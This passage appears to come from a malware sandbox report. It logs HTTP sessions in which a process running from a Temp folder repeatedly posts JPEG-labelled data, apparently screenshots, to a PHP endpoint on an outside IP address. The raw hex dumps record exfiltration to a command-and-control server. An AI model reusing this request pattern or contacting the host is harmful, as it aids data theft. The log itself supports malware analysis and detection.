                                        Aug 29, 2021 22:27:28.710719109 CEST5756OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:28.710733891 CEST5761OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:28.745495081 CEST5766OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:28.745538950 CEST5777OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:28.745611906 CEST5799OUTData Raw: 15 98 de 31 f0 af f0 db de d4 2d e3 2f 0d 76 86 f6 ba 15 54 fa 33 95 e1 2a 2e c6 e0 60 7b d1 91 5c f1 f1 9f 87 fb 45 79 4d 3e 33 d0 87 48 ee ff 00 4a 7c eb b0 be af 50 e9 33 4b 9a e6 7f e1 36 d1 07 fc b2 bb a5 1e 37 d1 47 fc b2 bb a3 99 0d 50 a9
                                        Data Ascii: 1-/vT3*.`{\EyM>3HJ|P3K67GP8\'Z0W_/'z?hnJW4TuDxIwC)SO5?64QhE<W>#ic]n1K'Ks}i3W3LsQ;LuVhW
                                        Aug 29, 2021 22:27:28.745683908 CEST5810OUTData Raw: 4a 33 4c 43 85 3a 98 0d 2e 69 8a c4 82 96 98 0d 38 1a ab 93 61 c2 9d 9a 8c 1a 5c d3 b9 36 24 06 97 35 1e 68 cd 3b 8a c4 bb a8 dd 51 6e a3 75 3e 60 e5 26 0d 46 ea 84 1a 70 34 f9 85 ca 4c 1a 8d de f5 0e 69 73 4f 98 5c a4 bb a8 2d 51 66 8d d4 b9 83
                                        Data Ascii: J3LC:.i8a\6$5h;Qnu>`&Fp4LisO\-QfuPK3Q<uqX~hGK3QyPi2hBhWO\*!J)M.j<4`4iiZb$Gp5I(<SZ)A!Z*<6E&ii)NKxL-Rh
                                        Aug 29, 2021 22:27:28.850677013 CEST5830INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:28 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        43192.168.2.44977946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:29.129292965 CEST5831OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----5ccf81e5d5beedf32ef8d7c3d7ac6c8c
                                        Host: 46.17.96.36
                                        Content-Length: 108017
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:29.129467964 CEST5831OUTData Raw: 2d 2d 2d 2d 2d 2d 35 63 63 66 38 31 65 35 64 35 62 65 65 64 66 33 32 65 66 38 64 37 63 33 64 37 61 63 36 63 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------5ccf81e5d5beedf32ef8d7c3d7ac6c8cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:29.129683971 CEST5841OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:29.129825115 CEST5844OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:29.165026903 CEST5849OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:29.165091991 CEST5852OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:29.165568113 CEST5864OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:29.165612936 CEST5869OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:29.200702906 CEST5877OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:29.200740099 CEST5883OUTData Raw: e1 0a 50 29 45 2d 32 4b 3a 7b 2c 57 d1 bb b0 55 19 c9 3f 43 5d 64 37 b7 97 1a 7b da c1 73 3c b6 48 c1 de 24 90 98 d5 8f 42 40 e0 1e 0f 3e d5 c4 9a ed be 1e fc 41 ff 00 84 13 fb 47 fe 25 7f 6e fb 6f 95 ff 00 2f 1e 56 cd 9b ff 00 d9 6c e7 7f b7 4a
                                        Data Ascii: P)E-2K:{,WU?C]d7{s<H$B@>AG%no/VlJ)j:QI/ntMb^.$N\E:x|nTc#RIUZcN1s^jay'P{l3xD!|8;RIU
                                        Aug 29, 2021 22:27:29.201000929 CEST5886OUTData Raw: 56 1d 46 29 a0 8f 5a 0b 0f 5a 61 61 c6 9b 46 45 19 a5 74 00 69 28 26 90 9a 40 38 53 c5 30 1a 76 6a 93 13 40 7a d1 de 90 9a 33 9a 00 53 47 6a 05 14 08 51 4b 8a 07 34 13 8a a0 0a 5f 7a 40 68 cd 02 b0 f1 4b 4d 07 9a 75 32 42 90 d2 d0 69 80 83 a5 2e
                                        Data Ascii: VF)ZZaaFEti(&@8S0vj@z3SGjQK4_z@hKMu2Bi.(P1NP)uJdZ`(65DfNM>0R(Jh;u4pxBcRzEM"e4`GqC;S39,>L2,:4
                                        Aug 29, 2021 22:27:29.310905933 CEST5940INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:29 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        44192.168.2.44978046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:30.364165068 CEST5941OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----5ccf81e5d5beedf32ef8d7c3d7ac6c8c
                                        Host: 46.17.96.36
                                        Content-Length: 108017
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:30.364429951 CEST5941OUTData Raw: 2d 2d 2d 2d 2d 2d 35 63 63 66 38 31 65 35 64 35 62 65 65 64 66 33 32 65 66 38 64 37 63 33 64 37 61 63 36 63 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------5ccf81e5d5beedf32ef8d7c3d7ac6c8cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:30.364464045 CEST5951OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:30.364554882 CEST5954OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:30.399805069 CEST5962OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:30.399867058 CEST5967OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:30.400140047 CEST5976OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:30.400685072 CEST5979OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:30.435656071 CEST5995OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:30.435725927 CEST6006OUTData Raw: 15 98 de 31 f0 af f0 db de d4 2d e3 2f 0d 76 86 f6 ba 15 54 fa 33 95 e1 2a 2e c6 e0 60 7b d1 91 5c f1 f1 9f 87 fb 45 79 4d 3e 33 d0 87 48 ee ff 00 4a 7c eb b0 be af 50 e9 33 4b 9a e6 7f e1 36 d1 07 fc b2 bb a5 1e 37 d1 47 fc b2 bb a3 99 0d 50 a9
                                        Data Ascii: 1-/vT3*.`{\EyM>3HJ|P3K67GP8\'Z0W_/'z?hnJW4TuDxIwC)SO5?64QhE<W>#ic]n1K'Ks}i3W3LsQ;LuVhW
                                        Aug 29, 2021 22:27:30.435786963 CEST6014OUTData Raw: ff 00 0a eb c5 7e 5e 7c cf 9f 6e 3a e7 ca 38 a8 aa b9 92 5e 66 94 e5 ca db 3b 78 8d ff 00 8e ae 25 95 6e e6 b1 d0 23 72 91 88 4e d9 2e 48 ea 49 ec 3f cf 5a 98 78 0b c3 6c cc 96 93 4d 0d d2 7f cb 48 6e 89 91 4f af 7f e5 4e b1 f3 bf e1 56 47 fd 97
                                        Data Ascii: ~^|n:8^f;x%n#rN.HI?ZxlMHnONVG?'gwc9ktBg>c?s]49*rQv:9]H9+Gh+_SAJ\8%_oGZ(1ATY%oW/,98]?R,'{5
                                        Aug 29, 2021 22:27:30.549608946 CEST6050INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:30 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        45192.168.2.44978346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:30.824812889 CEST6063OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----0906b0bfa15b848264cc97903c8df716
                                        Host: 46.17.96.36
                                        Content-Length: 110651
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:30.824939966 CEST6064OUTData Raw: 2d 2d 2d 2d 2d 2d 30 39 30 36 62 30 62 66 61 31 35 62 38 34 38 32 36 34 63 63 39 37 39 30 33 63 38 64 66 37 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------0906b0bfa15b848264cc97903c8df716Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:30.825229883 CEST6074OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:30.825316906 CEST6076OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:30.857372046 CEST6079OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:30.857424021 CEST6082OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:30.857434988 CEST6085OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:30.857777119 CEST6097OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:30.857819080 CEST6099OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:30.857836962 CEST6102OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:30.889980078 CEST6121OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:30.995279074 CEST6182INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:30 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        46192.168.2.44978446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:31.234049082 CEST6183OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----0906b0bfa15b848264cc97903c8df716
                                        Host: 46.17.96.36
                                        Content-Length: 110651
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:31.234113932 CEST6183OUTData Raw: 2d 2d 2d 2d 2d 2d 30 39 30 36 62 30 62 66 61 31 35 62 38 34 38 32 36 34 63 63 39 37 39 30 33 63 38 64 66 37 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------0906b0bfa15b848264cc97903c8df716Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:31.234265089 CEST6193OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:31.234348059 CEST6196OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:31.269649982 CEST6199OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
